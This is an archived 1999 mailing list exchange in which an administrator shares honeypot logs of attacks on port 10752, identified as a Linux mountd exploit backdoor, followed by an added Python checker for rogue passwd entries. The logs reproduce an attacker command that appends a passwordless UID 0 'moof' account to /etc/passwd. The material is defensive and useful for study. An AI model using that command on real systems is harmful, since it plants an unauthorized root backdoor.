Firewall Wizards mailing list archives
RE: Port 10752?
From: "Frank W. Keeney" <FKeeney () hsa com>
Date: Wed, 24 Mar 1999 08:27:10 -0800
Thank you.

I run the Deception Toolkit on one of my hosts to make it appear vulnerable to mountd exploits. I started seeing attempts at 10752 so I created a port 10752 deception. A few days ago I logged this:

Hostname and ip addresses removed for obvious reasons:

Commands to port 10752:

S0 Init
S0 trap '' SIGALRM SIGTRAP
S0 PATH=/usr/local/bin:/bin:/usr/bin:/sbin:/usr/sbin;export PATH
S0 /usr/sbin/rpc.mountd </dev/null
S0 /bin/uname -a;/usr/bin/id;echo 'moof::0:0::/:/bin/bash'
/etc/passwd

Attempts to telnet using moof username:

S0
S0 moof
S0 mooof
S0 moof
S0 moof
S0 moof
S0 moof
S0 moof
S0 moof

Another try:

S0 Init
S0 trap '' SIGALRM SIGTRAP
S0 PATH=/usr/local/bin:/bin:/usr/bin:/sbin:/usr/sbin;export PATH
S0 /usr/sbin/rpc.mountd </dev/null
S0 /bin/uname -a;/usr/bin/id;echo 'moof::0:0::/:/bin/bash'
/etc/passwd
S0 ChildSignal ALRM

More attempts to telnet using moof username:

S0
S0 moof

----------
From: Vern Paxson [SMTP:vern () ee lbl gov]
Sent: Tuesday, March 23, 1999 8:28 PM
To: Frank W. Keeney
Cc: firewall-wizards () nfr net
Subject: Re: Port 10752?

> What is Port 10752?
>
> I've been scanned several times from different locations for this port
> number.

It's a backdoor. In particular, that's the port that one of the Linux mountd overflow exploits runs its backdoor on if it succeeds.
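
Added example (not part of the original messages): a small check a defender could run over captured session commands or over a passwd file to flag records like the 'moof' entry in the log above, which has an empty password field and UID 0. The function names and the sample passwd file are constructed for illustration; the two session lines are taken from the log in the post.

```python
import re

# passwd record: name:passwd:uid:gid:gecos:home:shell
PASSWD_RE = re.compile(
    r"([A-Za-z_][\w.-]*):([^:\s']*):(\d+):(\d+):([^:'\n]*):([^:\s']*):([^:\s']*)"
)

# Two command lines as they appear in the log quoted in the post.
SESSION_LOG = """\
S0 PATH=/usr/local/bin:/bin:/usr/bin:/sbin:/usr/sbin;export PATH
S0 /bin/uname -a;/usr/bin/id;echo 'moof::0:0::/:/bin/bash'
"""

# Constructed sample passwd file (not from the post).
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
moof::0:0::/:/bin/bash
guest::1001:1001:Guest:/home/guest:/bin/sh
"""

def audit_entry(name, passwd, uid):
    """Return the findings for one passwd-format record."""
    findings = []
    if passwd == "":
        findings.append("empty password field")
    if int(uid) == 0 and name != "root":
        findings.append("UID 0 account other than root")
    return findings

def scan(text):
    """Find passwd-format records anywhere in text (a passwd file or
    logged commands) and return {name: findings} for the risky ones."""
    report = {}
    for m in PASSWD_RE.finditer(text):
        findings = audit_entry(m.group(1), m.group(2), m.group(3))
        if findings:
            report[m.group(1)] = findings
    return report

if __name__ == "__main__":
    for label, text in (("session", SESSION_LOG), ("passwd", PASSWD_SAMPLE)):
        for name, findings in scan(text).items():
            print(f"{label}: {name}: {', '.join(findings)}")
```

The PATH line is included to show that colon-separated directory lists do not match the record pattern, since the third field must be numeric.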